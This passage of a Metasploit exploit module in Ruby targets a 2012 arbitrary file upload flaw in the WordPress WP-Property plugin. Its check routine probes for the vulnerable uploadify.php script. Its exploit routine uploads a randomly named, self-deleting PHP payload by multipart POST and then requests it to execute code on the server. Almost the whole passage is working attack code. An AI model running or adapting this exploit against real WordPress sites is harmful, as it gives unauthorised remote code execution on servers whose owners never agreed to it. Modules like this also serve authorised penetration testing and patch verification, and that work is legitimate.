				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '82656' ],
					[ 'BID', '53787' ],
					[ 'EDB', '18987'],
					[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
				],
			'Payload'	     =>
				{
					'BadChars' => "\x00",
				},
			'Platform'       => 'php',
			'Arch'		     => ARCH_PHP,
			'Targets'        =>
				[
					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
					[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 26 2012'))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
			], self.class)
	end

	def check
		uri =  target_uri.path
		uri << '/' if uri[-1,1] != '/'

		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
		})

		if not res or res.code != 200
			return Exploit::CheckCode::Unknown
		end

		return Exploit::CheckCode::Appears
	end

	def exploit
		uri =  target_uri.path
		uri << '/' if uri[-1,1] != '/'

		peer = "#{rhost}:#{rport}"

		@payload_name = "#{rand_text_alpha(5)}.php"
		php_payload = get_write_exec_payload(:unlink_self=>true)

		data = Rex::MIME::Message.new
		data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
		data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

		print_status("#{peer} - Uploading payload #{@payload_name}")
		res = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
			'data'   => post_data
		})

		if not res or res.code != 200 or res.body !~ /#{@payload_name}/
			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
		end

		upload_uri = res.body

		print_status("#{peer} - Executing payload #{@payload_name}")
		res = send_request_raw({
			'uri'    => upload_uri,
			'method' => 'GET'
		})
	end
end